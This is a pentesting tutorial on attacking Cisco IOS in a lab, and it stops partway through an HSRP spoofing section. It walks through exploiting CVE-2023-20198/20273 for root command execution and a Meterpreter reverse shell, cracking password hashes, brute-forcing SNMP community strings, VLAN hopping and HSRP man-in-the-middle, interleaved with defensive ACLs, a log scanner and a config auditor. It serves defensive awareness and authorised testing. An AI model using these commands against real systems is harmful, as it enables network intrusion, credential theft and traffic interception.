Lyrica: Pentesting Cisco IOS

Cisco hardware is distributed around the world and is often the target of attackers. In this article, I will demonstrate a Cisco IOS pentest.

Caster - Lyrica

Genre: Offensive
Label: exploit.org
Release Date: 3 July 2024

Performed by: Caster
Written by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)

Intro

This article is intended to raise awareness among security engineers when operating Cisco equipment. Although it is an Offensive article, it is intended for both pentesters and network engineers.

"Disciple"

On April 24, 2024, I released a great article on Cisco IOS security, demonstrating the configuration of network security mechanisms. You'll find it useful.

https://blog.exploit.org/caster-disciple/

Disclaimer

This article is for informational purposes and is intended for security specialists conducting testing under an agreed contract. The author and exploit.org are not responsible for any damage caused by the use of the information provided.

Disruption of systems and hacking into other people's computer networks will be prosecuted. Be careful and do not try your luck.

CVE-2023-20273

This is a vulnerability in the Cisco IOS XE Web UI, the web interface used to manage Cisco IOS XE devices.
CVE-2023-20273 is dangerous because it allows an unauthenticated attacker to execute system commands on the device. With this vulnerability an attacker can also inject a malicious implant to gain full control of the device.

This is a serious problem, not only because of the ease of exploitation, but because Cisco IOS control panels are often overlooked. In production networks this is a big problem: a Cisco IOS device could be reachable from the Internet with an open Web UI, which means an attacker could launch this attack from the Internet and breach the external perimeter of the network.

I'll demonstrate the process of exploiting this vulnerability using Metasploit so you get the gist of the problem. In my lab network, I have a Cisco CSR under IP address 192.168.1.89 that is vulnerable to CVE-2023-20273.

caster@kali:~$ msfconsole
msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options

Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   CISCO_ADMIN_PASSWORD                    no        The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.
   CISCO_ADMIN_USERNAME                    no        The username of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin account.
   CMD                    id               yes       The OS command to execute.
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   REMOVE_OUTPUT_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to removing the commands output file.
   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                  443              yes       The target port (TCP)
   SSL                    true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                                   no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 

cisco_ios_xe_os_exec_cve_2023_20273 module

msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
[*] Running module against 192.168.1.89

uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0

[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 

Successful exploitation, launching the id command (RCE)

CVE-2023-20273 exploitation screenshot. root

So it is possible to attack Cisco IOS using this vulnerability. This is a serious issue, and it proves once again how important it is to filter access to the control panels of your network equipment.

CVE-2023-20198

This vulnerability is also related to the Cisco IOS XE Web UI feature. CVE-2023-20198 occurs due to incorrect path validation in nginx filtering, which allows bypassing authentication and accessing the webui_wsma_http web interface endpoint. This bypass gives the attacker the ability to execute arbitrary Cisco IOS commands or make configuration changes with level 15 privileges.
In fact, because of this vulnerability, the attacker gains full control over the hardware.

Exploiting this vulnerability is very simple: all you need to do is download the exploit and conduct the attack. The ease of exploitation is itself a problem, since even a high school student can handle it.

caster@kali:~$ git clone https://github.com/smokeintheshell/CVE-2023-20198

With the -c argument, you can check the target hardware for this vulnerability:

caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -c
Testing for vulnerability
Target IP:	192.168.1.89
Target URL:	http://192.168.1.89/%2577eb%2575i_%2577sma_Http
Vulnerable:	True
IOS Ver:	CSR1000V CSR IOS 17.3 Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3)

Done.
caster@kali:~/CVE-2023-20198$ 

The target Cisco CSR is affected by this vulnerability

Getting the configuration

The -g argument allows you to dump the entire configuration of the vulnerable hardware:

caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -g
Configuration of a vulnerable Cisco CSR

Creating an attacker account

You can create an account to get into the control panel:

caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -a -u caster -p deftones-myownsummer
Selected Target:	192.168.1.89
Adding New Privilege 15 User
Add User Name:	caster
Add User Pass:	deftones-myownsummer

Sending exploit to target URL:	http://192.168.1.89/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.
Control Panel (UI)
Web UI Control Panel

Execution of IOS system commands

It is also possible to execute IOS system commands when exploiting this vulnerability:

caster@kali:~/CVE-2023-20198$ ./exploit.py -t 192.168.1.89 -e "show run | sec username"        
Selected Target:	192.168.1.89
Running in Exec Mode
Executing Command:	show run | sec username

Sending exploit to target URL:	http://192.168.1.89/%2577eb%2575i_%2577sma_Http

username gestalt privilege 15 secret 9 $9$jyjNL./i5hMWCk$RrpsXqSmozq1KHYuGQQXtzv3mpQOKoNFyLr6EfUlubo
username death privilege 15 secret 5 $1$QRIf$jgEB4g2.MCKm.upWbfLbM0
username pregabalin150mg privilege 10 secret 8 $8$vsgWwxvLQJiDYU$D1rCRMZLhdphSn82D9rwpeCF5ZG75TY.15okuL/L1K2
username caster privilege 15 secret 9 $9$L4H.qKvAZ6tbW.$eEcAWawEJjbetZImz7Dlduw1d.fHeDiQQYBvXbfPGsc

Done.
Account information on the vulnerable Cisco CSR and password hashes

This is how the CVE-2023-20198 vulnerability is exploited.
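On the defensive side, the tell-tale sign of this bypass in the transcripts above is the double percent-encoded request path that decodes to the webui_wsma_http endpoint. The following is my own added example, not code from the article or from the exploit repository: it assumes access-log lines in common log format (for instance from a proxy in front of the management interface) and flags requests whose path only resolves to that endpoint after more than one round of decoding.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in common log format (not taken from the article or a real device).
SAMPLE_LOG = """\
192.168.1.103 - - [02/Jul/2024:21:30:01 +0500] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200 512
192.168.1.50 - - [02/Jul/2024:21:30:05 +0500] "GET /webui/ HTTP/1.1" 200 2048
192.168.1.103 - - [02/Jul/2024:21:31:12 +0500] "POST /%25%37%37ebui_wsma_HTTP HTTP/1.1" 200 256
192.168.1.60 - - [02/Jul/2024:21:32:00 +0500] "GET /webui_wsma_http HTTP/1.1" 401 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d+)'
)
# Endpoint named in the article as the one reached by the path-validation bypass.
SENSITIVE_ENDPOINT = "webui_wsma_http"


def normalize_path(raw, max_rounds=5):
    """Percent-decode until the string stops changing; return (decoded, rounds).

    A web server decodes a path once, so rounds >= 2 means the client encoded
    it more than once, which is exactly how a string-based filter gets bypassed.
    """
    path, rounds = raw, 0
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def scan_log(text):
    """Return one finding per request whose fully decoded path reaches the
    WSMA endpoint only after multi-level percent-encoding."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, rounds = normalize_path(m["path"])
        target = path.split("?", 1)[0].lstrip("/").lower()
        if target.startswith(SENSITIVE_ENDPOINT) and rounds >= 2:
            findings.append({
                "src": m["src"], "ts": m["ts"], "status": int(m["status"]),
                "raw_path": m["path"], "decoded_path": path, "decode_rounds": rounds,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[!] {f['ts']} {f['src']} -> {f['raw_path']} decodes "
              f"({f['decode_rounds']}x) to {f['decoded_path']} (HTTP {f['status']})")
```

A direct, single-encoded hit on the endpoint (the 401 line) is left alone because that is what the legitimate Web UI does; the point is the extra encoding layer, not the endpoint name.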

CVE-2023-20273 & CVE-2023-20198 Exploitation

Metasploit has a special module, cisco_ios_xe_rce, which exploits a chain of two vulnerabilities, CVE-2023-20198 and CVE-2023-20273. This leads to RCE and a Meterpreter shell.

caster@kali:~$ msfconsole
msf6 > use exploit/linux/misc/cisco_ios_xe_rce

[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.103:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'geuYApUX' with password 'UFcNqxge'
[*] Removing user 'geuYApUX'
[*] Sending stage (3045380 bytes) to 192.168.1.89
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.89:58492) at 2024-07-02 21:37:55 +0500

Exploitation and appearance of the meterpreter shell

Meterpreter Shell
IOS Shell (uname -a & id)

A final word on these two vulnerabilities

The ease of exploitation of these vulnerabilities, as well as the consequences, further demonstrates the critical importance of monitoring access to your equipment's control panels. Especially if your equipment is facing the Internet.
This is a warning to network engineers: be careful and check who can reach your Cisco IOS control panel, to avoid what I have demonstrated above.

I will show a small example of how you can protect Cisco IOS control panels from attack using access control lists (ACLs).
Suppose we have an administrators' network, 10.251.140.0/24. Only this network may access the control panel of the Cisco equipment; other subnets will be blocked.

CSR(config)# ip access-list standard VTY_SEC
CSR(config-std-nacl)# permit 10.251.140.0 0.0.0.255
CSR(config-std-nacl)# deny any
CSR(config)# line vty 0 15
CSR(config-line)# access-class VTY_SEC in
CSR(config-line)# login on-failure log
CSR(config-line)# login on-success log
CSR(config)# ip http access-lists VTY_SEC
CSR(config)# ip http secure-server

This is how you can restrict access to the Cisco IOS hardware control panel, a fairly simple technique. Access to the VTY lines is allowed only from the 10.251.140.0/24 network; all other sources are blocked.

Evading RA Guard

RA Guard is designed to filter out illegitimate RA messages. Typically, an attacker uses RA to impose itself as a default gateway address at the IPv6 layer or as a DNS server at the IPv6 layer.
A popular tool among pentesters is mitm6; by manipulating RA/DHCPv6 messages, it allows an attacker to impose itself as a DNS server at the IPv6 level while performing an incomplete SLAAC attack.
However, it is worth noting that mitm6 relies more on DHCPv6 messages than RA.

An incomplete SLAAC attack is one in which the attacker does not impose itself as a full-fledged default gateway address, limiting itself to affecting DNS information only.

This is what an RA (Router Advertisement) message looks like:

RA Packet (Type 134)

Running mitm6 with the --no-ra flag will allow mitm6 to run without sending RA messages to evade RA Guard:

caster@kali:~$ sudo mitm6 -i eth0 --no-ra
RA packet missing with --no-ra argument

This way you can evade RA Guard if it is active on the switch at the time of your penetration testing project.

However, this attack will be thwarted by configured DHCPv6 Snooping.

Identifying the Cisco IOS version

Determining the Cisco IOS version is critical information for a pentester. A pentester who knows the Cisco IOS version can learn about its specifics, and it is also possible to find an exploit for a particular Cisco IOS version.

CDP

CDP is a neighbor discovery protocol for Cisco IOS hardware, and in most cases it is active by default on all ports of a Cisco device. This is what an attacker will see when analyzing the traffic:

CDP frame (Cisco 3560)

This sensitive information can play a big role for the attacker. It is important to monitor the status of CDP on device ports and carefully turn it off where it is not needed. Also consider that there may be VoIP on the network that depends on CDP.

SNMP

SNMP is a protocol designed for monitoring network infrastructure, but it is not an uncommon target of attacks inside a network. In the hands of a pentester, SNMP can serve as a tool to gather information about hardware. This is accomplished by brute-forcing the SNMP community string, with which the attacker can enumerate information about the hardware.

Brute-forcing the SNMP community string is possible with onesixtyone:

caster@kali:~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.1.89
Bruteforce SNMP Community string (Cisco CSR)

In the context of our case study, two strings are found: public and private.
In practice, public and private are the default strings in most cases. This is a common network security problem in production; many people forget about it.
On my lab Cisco router, the string public has read-only (RO) permissions and private has both read and write (RW) permissions.

A string with RO rights can be used to collect equipment information. For example, you can use the snmp_enum module in Metasploit, a very handy tool.

msf6 auxiliary(scanner/snmp/snmp_enum) > show options

Module options (auxiliary/scanner/snmp/snmp_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      161              yes       The target port (UDP)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/snmp/snmp_enum) > 

My router in the lab has the address 192.168.1.89, so let's specify it in RHOSTS.

msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(scanner/snmp/snmp_enum) > run
Result of snmp_enum module operation

This is roughly how you can discover the Cisco IOS version: by analyzing CDP traffic and by SNMP enumeration, having previously guessed the community string.

Cisco Passwords

Cisco IOS passwords reside locally on the hardware and are protected using cryptographic hash functions. However, there are security issues here as well, in the form of insecure password hashing methods. Below I will explain why.

Type 4

Type 4 appeared in 2013. It uses PBKDF2 and was originally designed to reduce vulnerability to brute-force attacks. However, due to an implementation issue, the Type 4 algorithm only performs one SHA-256 iteration (without a salt) over the entered plaintext password, making it less secure than Type 5 and more vulnerable to brute-force attacks. Passwords are stored as hashes in the configuration file.

username myths secret 4 g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6

Such hashes can be brute-forced using John the Ripper. Just specify the file with the hash and the path to the dictionary, nothing complicated.

caster@kali:~/gestalt$ cat hashes 
myths:g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6
caster@kali:~/gestalt$ john hashes --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd         (myths)     
1g 0:00:00:00 DONE (2024-06-30 02:28) 50.00g/s 6553Kp/s 6553Kc/s 6553KC/s 123456..kovacs
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed. 
Cracked Type 4 password

Type 5

Type 5 uses a very simple MD5 hashing algorithm - 1000 iterations of MD5 with a 32-bit salt. Type 5 passwords are relatively easy to crack by brute force using modern computers and available tools. Passwords are stored as hashes in a configuration file.

caster@kali:~/gestalt$ cat hashes 
drift:$1$TlXl$FlGAzr9Hn8VqowimPu.TD/
caster@kali:~/gestalt$ john hashes --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cisco            (drift)     
1g 0:00:00:00 DONE (2024-06-30 02:38) 20.00g/s 491520p/s 491520c/s 491520C/s 210586..20032003
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
Cracked Type 5 password

Type 7

An extremely insecure way to protect passwords: it uses a Vigenère cipher and is very easy to crack using tools such as ciscot7 or cisco7crack.

username enchant password 7 055A545C7519
caster@kali:~/gestalt$ cisco7crack 055A545C7519
Encrypted string : 055A545C7519
Plain string     : 12345
caster@kali:~/gestalt$ 
Cracked Type 7 password
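Pulling the password-type and SNMP-community findings of the previous sections together, here is an added defender-side audit of my own (not a tool from the article) that parses a running-config excerpt and flags type 0/4/5/7 credentials, the default public/private community strings, writable communities, and a plain-HTTP management server. The config excerpt is constructed for the example, with the hashes reused from the article's own listings.

```python
import re

# Constructed running-config excerpt (hashes copied from the article's own examples).
SAMPLE_CONFIG = """\
hostname CSR
username gestalt privilege 15 secret 9 $9$jyjNL./i5hMWCk$RrpsXqSmozq1KHYuGQQXtzv3mpQOKoNFyLr6EfUlubo
username death privilege 15 secret 5 $1$QRIf$jgEB4g2.MCKm.upWbfLbM0
username myths secret 4 g1rTD89b38NIXbGJse.zLc7Cega1TBTlKQNvYDh9Qo6
username enchant password 7 055A545C7519
username legacy password cleartext123
snmp-server community public RO
snmp-server community private RW
snmp-server community n3tm0n-ro RO
ip http server
ip http secure-server
"""

# Cisco IOS credential types and how much effort recovery takes (see the Type 4/5/7 sections).
SECRET_TYPES = {
    "0": ("cleartext", "critical"),
    "7": ("type 7, reversible Vigenere-style encoding", "critical"),
    "4": ("type 4, a single unsalted SHA-256 iteration", "high"),
    "5": ("type 5, MD5-crypt with 1000 iterations", "medium"),
    "8": ("type 8, PBKDF2-SHA256", "info"),
    "9": ("type 9, scrypt", "info"),
}
DEFAULT_COMMUNITIES = {"public", "private"}

USER_RE = re.compile(r"^username (\S+)(?: privilege (\d+))? (secret|password) (?:(\d) )?(\S+)")
SNMP_RE = re.compile(r"^snmp-server community (\S+)(?: (RO|RW))?")


def audit_config(text):
    """Return (severity, message) findings for weak credentials, default SNMP
    strings, writable communities and a plain-HTTP management interface."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        m = USER_RE.match(line)
        if m:
            user, priv, _kind, stype, _value = m.groups()
            stype = stype or "0"  # 'password foo' with no type number is cleartext
            desc, sev = SECRET_TYPES.get(stype, (f"unknown type {stype}", "medium"))
            if sev != "info":
                findings.append((sev, f"user {user} (privilege {priv or '1'}) uses {desc}; "
                                      f"re-enter it as a type 8/9 secret"))
            continue
        m = SNMP_RE.match(line)
        if m:
            community, mode = m.groups()
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append(("high", f"SNMP community '{community}' ({mode or 'RO'}) is a default string"))
            elif mode == "RW":
                findings.append(("medium", f"SNMP community '{community}' has write access; "
                                           f"restrict it with an ACL or remove it"))
            continue
        if line == "ip http server":
            findings.append(("medium", "plain-HTTP management interface enabled; prefer "
                                       "'ip http secure-server' behind an access-list"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_config(SAMPLE_CONFIG):
        print(f"[{severity:<8}] {message}")
```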

TACACS+

This protocol is similar to RADIUS and is used in the Cisco ecosystem to control access to equipment via an AAA server.
However, there is a risk of TACACS+ traffic being intercepted and the key being brute-forced, so care must be taken to keep the TACACS+ key secure.

If an attacker performs a MITM attack and intercepts TACACS+ traffic, they have the ability to brute-force the key. To intercept the traffic and brute-force the key, the attacker uses Loki.

Cracked TACACS key
Inserting a key into Wireshark
Decrypted TACACS protocol header

So if you have TACACS+ on your network, take care of key bruteforce resistance.

SMI (2960-X)

Exploitation of Cisco Smart Install is nothing new among pentesters. However, there is a risk of disrupting a Cisco 2960-X switch. For some reason the 2960-X reacts strangely to the SIET exploit: at the moment of exploitation a DoS occurs and the switch freezes, not even responding to ICMP Echo requests.

If you find SMI (TCP/4786) in your project, please check with your client to see if 2960-X is there by any chance. If it is present - do not take risks and do not exploit this hole. Be careful with SIET.

Don't use CAM Table Overflow

I have noticed that this attack is often explained in network security training materials, but this attack is not applicable to production networks.
CAM Table Overflow can not only overload the switch CPU but also cause Unicast Flood. This is a phenomenon where Unicast traffic starts to propagate as broadcast traffic. This can have a serious impact on network performance.
This attack sounds cool only in words, but I would not recommend using this attack in production. CAM Table Overflow has serious side effects.

VoIP VLAN Hopping

The Cisco Discovery Protocol (CDP) can be used by attackers to perform VLAN Hopping, allowing unauthorized access to various VLANs, including VoIP VLAN.

Concept

The concept is simple enough. You need to capture a CDP frame of a legitimate VoIP phone, and then use tcpreplay to replay that frame so that the attacker's laptop can pretend to be the phone to gain access to the Voice VLAN.

Stage I: Learning about switch port information

It is necessary to study how the switch port operates and how it is configured. This is accomplished by analyzing the CDP frame. You will have to temporarily disconnect the VoIP phone and connect your device to the switch.

CDP from Cisco switch

Based on the dump of this traffic we can see that the port is indeed configured for Voice VLAN.
The switch port is GigabitEthernet1/0, and the Voice VLAN ID is 512.

Stage II: Capture and analyze a CDP frame from a phone

Now plug the VoIP phone back into the switch, and plug yourself into the VoIP phone's data port. Now we need to capture a CDP frame from the VoIP phone itself. I'll be using Wireshark for this.

CDP from VoIP

Phone - Cisco IP Phone 7945G
Voice VLAN ID - 512
I need to save this traffic dump.

Stage III: Play back a CDP frame from VoIP

Now you need to replay the captured pcap to pretend to be an IP phone.
This can be done with tcpreplay, a utility that will replay the traffic. When the CDP frame of the VoIP phone arrives on the switch port, the voice VLAN will be available to the attacker.

However, you must consider that a legacy Cisco phone sends a CDP frame every 60 seconds. You need to send this frame every 60 seconds as well; you can use watch to do this:

caster@kali:~$ sudo watch -n 60 "tcpreplay -i eth0 cdpvoip.pcap"

Stage IV: Virtual VLAN Interfaces

After replaying the CDP frame, a virtual 802.1Q interface must be created to work with the Voice VLAN. It is required to work with the target VLAN.

caster@kali:~$ sudo apt install vlan
caster@kali:~$ sudo vconfig add eth0 512
caster@kali:~$ sudo ip link set eth0.512 up
caster@kali:~$ sudo dhclient -v eth0.512

Create the interface using vconfig, raise to the up state, and then request an address via DHCP. The attacker can obtain the address either by DHCP or by configuring it statically.

This concludes the chapter on VoIP VLAN Hopping. Despite the existence of the voiphopper utility, which automates the whole process, I decided to explain this attack in detail so that you can better understand what is involved.

DTP Attacks (VLAN Hopping)

One of the most common network attacks on Cisco equipment, an extremely hackneyed topic really. However, it is a rare misconfig. It occurs on forgotten ports of Cisco 2960 switch, a kind of Shadow IT.
Most likely, such a port will be encountered in the context of an internal pentest in the customer's infrastructure.

The essence of a DTP attack is to send a specially prepared DTP Desirable frame that will switch the switch port to Trunk.
The problem is that all Cisco 2960 switch ports are in Dynamic Auto mode by default. And if a DTP Desirable frame is sent to such ports, the switch port will switch to trunk mode. It is important to take into account that the dynamic trunk lives only 5 minutes, so the DTP Desirable frame will have to be sent with a certain periodicity in order not to lose the trunk.

DTP frames on the air

You can use the Loki tool to attack the DTP.

Sending DTP Desirable frame

Now the switch port to which the attacker is connected is switched to trunk mode.

STP frames with 802.1Q tags

By analyzing the STP frames after VLAN switching, we can see the VLAN ID (Root Bridge System ID Extension)
VLANs: 120,140,175,180,200

Also looking at these STP frames, we can see 802.1Q tags there. This is understandable, because we are on a trunk port, and the frames are tagged on the trunk port. That's just for the record.

Now for the target VLAN IDs, you need to create virtual interfaces to jump to those VLANs. You can use vconfig to do this:

caster@kali:~$ sudo vconfig add eth0 120
caster@kali:~$ sudo vconfig add eth0 140
caster@kali:~$ sudo vconfig add eth0 175
caster@kali:~$ sudo vconfig add eth0 180
caster@kali:~$ sudo vconfig add eth0 200

caster@kali:~$ sudo ip link set eth0.120 up
caster@kali:~$ sudo ip link set eth0.140 up
caster@kali:~$ sudo ip link set eth0.175 up
caster@kali:~$ sudo ip link set eth0.180 up
caster@kali:~$ sudo ip link set eth0.200 up

You then need to obtain addresses for these virtual interfaces for networking within the target VLANs:

caster@kali:~$ sudo dhclient -v eth0.120
caster@kali:~$ sudo dhclient -v eth0.140
caster@kali:~$ sudo dhclient -v eth0.175
caster@kali:~$ sudo dhclient -v eth0.180
caster@kali:~$ sudo dhclient -v eth0.200

Example of obtaining an address via DHCP for interface eth0.140

Received DHCP address for eth0.140

This is how VLAN hopping can be accomplished using the shortcomings of the DTP protocol.
In fact, this case is rare, but that doesn't mean it won't happen at all.

HSRP Attacks

HSRP (Hot Standby Router Protocol) is a router redundancy protocol developed by Cisco to improve network availability. It allows multiple routers to share a single virtual IP address, providing automatic switchover to a backup router in the event of a primary router failure. This is one of the protocols of the FHRP (First Hop Redundancy Protocol) class.
Used in Cisco networks, it offers a hot standby system but does not do load balancing. This chapter deals with an HSRP attack followed by a MITM attack.

HSRP Theory

HSRP works by creating a group of routers, one of which is designated as the active router and the others as backup routers. The active router is responsible for handling traffic using a virtual IP address. If the active router fails, one of the standby routers automatically becomes the active router, ensuring continuity of service.

You can delve a little deeper into HSRP terminology to understand what kind of entities the HSRP group has:

HSRP Active — a device that acts as a virtual router and provides forwarding of traffic from source networks to destination networks.
HSRP Standby — a device that acts as a standby router, waiting for the active router to fail. When the primary Active router fails, the Standby router will take over the primary role and take over the duties of the Active router.
HSRP Group — a group of devices that ensures the operation and fault tolerance of a logical router.
HSRP MAC Address — the virtual MAC address of the logical router in the HSRP domain.
HSRP Virtual IP Address — This is a special virtual IP address in the HSRP group. This IP address will be the default gateway for the end hosts, used on the logical router itself.

This protocol has two versions (HSRPv1, HSRPv2) and they differ in the following characteristics:

  • Virtual MAC addresses: (HSRPv1 — 00:00:0c:07:ac:XX / HSRPv2 - 00:00:0C:9F:FX:XX) (XX - HSRP group number)
  • Multicast addresses: HSRPv1 — 224.0.0.2, HSRPv2 - 224.0.0.102
  • Number of groups: HSRPv1 offers up to 255 groups, while HSRPv2 supports up to 4096

Theory of attack

The essence of an attack on an HSRP domain is to send a false HSRP packet with the maximum priority value. This is done to take over the Active role, so that the attacker's device serves the entire segment's traffic: a MITM attack.
However, this attack is dangerous because the traffic of all hosts in the segment will go through the attacker's device, and if the attacker fails to handle such a heavy load, the segment suffers. Besides, it is impossible to exceed the capacity of the switch port you are connected to.
If you decide to launch this attack, make sure you have a powerful computer and a fast network interface. It would be funny if you spoofed FHRP with a 100-bit interface.

HSRP Lab Network

In my lab, the attacker is on the 172.16.0.0/24 network.
There are two HSRP speakers, under IP addresses 172.16.0.1 and 172.16.0.2, they serve a virtual HSRP address 172.16.0.254 which is the default gateway for legitimate clients.
The attacker's IP address is 172.16.0.3; it will attack the HSRP domain.

For spoofing, I'll be using the Loki tool. It is an old but very powerful tool for network attacks. It supports attacks against FHRP, HSRP among others, even with authentication support.
I will be using it in the course of my work.

Preparing and tuning the kernel

However, before MITM, you need to prepare your host, allow routing, and perform kernel tuning.

  1. A classic of the genre: switch your interface to promiscuous mode and allow routing. Allowing routing is a very important setting, because without it, during MITM, traffic from legitimate hosts will stop at your OS and will not go any further, which will cause DoS. It is also best to disable ICMP Redirect. When MITM occurs, your machine may generate these messages, which will alarm IDS/IPS sensors.
caster@kali:~$ sudo ip link set dev eth0 promisc
caster@kali:~$ sudo sysctl -w net.ipv4.ip_forward=1
caster@kali:~$ sudo sysctl -w net.ipv4.conf.all.accept_redirects=0
caster@kali:~$ sudo sysctl -w net.ipv6.conf.all.accept_redirects=0
  2. FTP, H.323 and other traffic that does not work well with NAT may pass through you. The nf_conntrack module will help to pass traffic of such protocols.
caster@kali:~$ sudo modprobe nf_conntrack
  3. With MITM, your device must be prepared to handle a lot of traffic. You can tweak the Linux kernel a bit to optimally handle the large amount of traffic you will receive during network spoofing.
caster@kali:~$ sudo sysctl -w fs.file-max=100000
caster@kali:~$ sudo sysctl -w net.core.somaxconn=65535
caster@kali:~$ sudo sysctl -w net.core.netdev_max_backlog=65536
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_fin_timeout=15
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_tw_reuse=1
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_tw_recycle=1
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_max_tw_buckets=65536

fs.file-max=100000 - increases the maximum number of file descriptors that can be opened simultaneously. This is important because each network connection requires a file descriptor. Increasing this value allows your laptop to handle more connections at the same time;
net.core.somaxconn=65535 - sets the maximum number of pending connections in the listen queue of a socket. In a MITM attack, especially FHRP spoofing, there may be many incoming connections waiting to be processed. This value increases the connection queue, which prevents connections from being dropped;
net.core.netdev_max_backlog=65536 - sets the maximum number of packets that can be queued on a network interface before being processed by the kernel. This allows your laptop to handle large amounts of incoming traffic more efficiently, which is critical for MITM attacks;
net.ipv4.tcp_fin_timeout=15 - reduces the waiting time before closing a connection after sending a FIN segment. This helps free up resources for new connections faster, which is useful for the large number of short connections typical of MITM attacks;
net.ipv4.tcp_tw_reuse=1 - allows TIME-WAIT TCP connections to be reused for new connections. This helps to avoid port shortages when there are a large number of short-lived connections;
net.ipv4.tcp_tw_recycle=1 - enables fast recycling of TIME-WAIT TCP connections. This allows resources to be released faster for new connections, which can be useful under heavy traffic, although it carries security risks (note that this sysctl was removed in Linux 4.12, so the command fails on current kernels);
net.ipv4.tcp_max_tw_buckets=65536 - increases the maximum number of TIME-WAIT TCP connections that the system can hold simultaneously. This allows your laptop to handle more connections without dropping them prematurely.

  4. TCP Window Scaling controls the scaling of the TCP window. Increasing the TCP window can improve data transfer performance in a high-latency or high-load network. In TCP, each side sets the size of its window, the number of bytes that can be sent without acknowledgment. Window Scaling provides the ability to increase this window size, which is especially useful when dealing with high-speed networks.
caster@kali:~$ sudo sysctl -w net.ipv4.tcp_window_scaling=1

Spoofing

You need to launch Loki and select the network interface to attack. In my case, it is eth0.

Loki found the HSRP packets
Wireshark found HSRP packets

If we analyze the HSRP traffic in more detail, we can see that the Active router priority is 150, which is less than 255. The group number is 1 and there is no authentication.

Then you need to start spoofing by clicking on Get IP and also check the Gratuitous ARP box.

Gratuitous ARP - this is a special type of ARP frame that notifies the entire link segment that a new MAC address and IP address mapping has occurred.
The beginning of spoofing
HSRP attacker packet with priority 255

You must then assign the HSRP virtual address to your interface as a secondary. Since we start serving this address after the attack, it is very important to put it on our interface.

